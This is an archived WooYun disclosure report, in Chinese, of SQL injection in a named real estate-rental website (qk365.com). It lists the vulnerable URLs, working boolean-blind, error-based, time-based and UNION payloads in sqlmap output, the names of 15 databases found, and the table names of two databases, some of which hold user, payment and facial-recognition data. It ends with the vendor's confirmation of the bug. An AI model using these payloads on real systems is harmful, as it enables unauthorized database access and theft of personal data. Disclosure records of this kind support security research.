乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
.
1,http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 2,www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481
---Parameter: channelParPagemark (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: channelParPagemark=1') AND 9321=9321 AND ('LoVW'='LoVW&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: channelParPagemark=1') AND (SELECT 3580 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(3580=3580,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IeTY'='IeTY&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: channelParPagemark=1') AND (SELECT * FROM (SELECT(SLEEP(5)))CAhr) AND ('RfwH'='RfwH&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: channelParPagemark=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716b71,0x4a616c744d4654497046704a5a59714869496f7a6e695045566a4476414c76454c575a566e696f4c,0x716b716b71),NULL,NULL,NULL,NULL-- -&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20---back-end DBMS: MySQL 5.0current user: '[email protected].%'current user is DBA: Falseavailable databases [15]:[*] db_wuye[*] ecombehaviour[*] ecomhouserent[*] freecms[*] freecms_sim[*] information_schema[*] mysql[*] partybuilding[*] qingke_crm[*] quartz[*] quartz_kq[*] quartz_pro[*] quartz_rpt[*] stock[*] testDatabase: ecomhouserent[88 tables]+------------------------------+| activity || activity_room || agency_clue || app_device_source || app_login_source || app_login_source_sync || area || base_info || bill_manage || cell_area || cell_area_bak || cell_area_copy || cell_photo || cell_photo_temp || collectionroom || comment || contract || coupon_user_list || customer_apply || customer_book || customer_cell || customer_reminder || customer_tenant || customer_tenant_copy || discuss || discuss_praise || drawcode_list || find_password || gift_detail || gift_type || goddess || hot_search_keys || info_notice || join_activity || landmark || leave_message || link_man || link_road || nyrecord || operatelog || owner_info || pay_type || payment || petty_expenses || petty_item || promotion_coupon || provincial || provincial_bak || push_message || reservation || review || road || room || room_admin || room_recomm || room_view || share_record || sig_reservation_subscription || subscription || subway || subway_station_code || t_coupons || t_coupons_code || t_feedback || t_mer_info || tmp_a || user_openid || user_openid_copy || v_find_booking || v_find_interest_rooms || v_find_new_rooms || v_find_orderform || v_find_reservation || v_find_rom_recomm || v_find_room_detail || v_find_room_friends || v_find_subscription || v_find_taobao_room_detail || v_rom_recomm || v_rom_rocomm_group || v_room_compara || v_stat_reservation || v_wx_double12 || v_wx_double12_a || v_wx_double12_b || village_ || vote || voucher |+------------------------------+Database: db_wuye[54 tables]+-----------------------------+| account_payment_relation || assign_log || bill_common || bill_detail || bill_task_bak || bill_task_main || building_num || camera_link_log || device_upload_info || dict_data || dict_type || fee_cost || model_acitvity_log || notice_info || pass_log || pay_mobile_call_log || property_company || rate_info || region_info || region_info_copy || repair_attach || repair_bill_info || room_info || room_user_info || room_user_relation || sms_log || software_release || sys_auth_info || sys_log || sys_org_info || sys_org_staff_relation || sys_role_auth_relation || sys_role_info || sys_staff_info || sys_staff_role_relation || third_pay_backcall_log || third_payment || user_apply_info || user_audit_log || user_citizen || user_command_log || user_device_info || user_door_detail || user_enterprise || user_face_pool || user_info || user_message_read || user_visitor_room_info || user_worker_info || village_info || village_userworker_relation || visitor_log || visitor_third_log || wx_token_record |+-----------------------------+
~~~
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 19:10
非常感谢,已经安排紧急修复
暂无
